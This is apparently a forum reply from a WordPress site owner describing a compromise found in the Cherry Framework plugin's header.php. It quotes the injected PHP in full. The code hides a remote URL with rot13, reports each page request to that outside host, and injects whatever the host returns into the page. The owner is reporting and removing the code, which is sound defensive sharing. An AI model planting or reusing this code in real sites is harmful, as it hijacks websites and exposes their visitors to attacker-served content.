Thanks for your reply. You didnt see it cause i managed to get it fixed!Here is how:
My theme is using the cherry framework plugin. Apparently what was compromised was not in the theme folder but the cherry framework one. In the header.php i found this:
<?php $url = str_rot13('uggc://scrq8.bet/flfgrz/yvaxbixn.cuc?qbabe=');if(!$SESSION['dsfdsfdsf']){if (function_exists('curl_version')){$handle = curl_init();curl_setopt($handle, CURLOPT_URL, $url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE);$adasd = curl_exec($handle);$SESSION['dsfdsfdsf'] = $adasd;echo $adasd;curl_close($handle);} else{$SESSION['dsfdsfdsf'] = file_get_contents($url . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]);echo $SESSION['dsfdsfdsf'];} }else{ echo $SESSION['dsfdsfdsf']; echo"<!--session--->";} ?>
Checking the dates does not really help since we have had to do a lot of cleaning which changed the dates anyway. I checked the rest of the files in that folder and it seems they are ok.
Now i am left wondering why the antivirus plugins didnt check there and the hack was left undetected and what else might have been compromised that I dont know about.
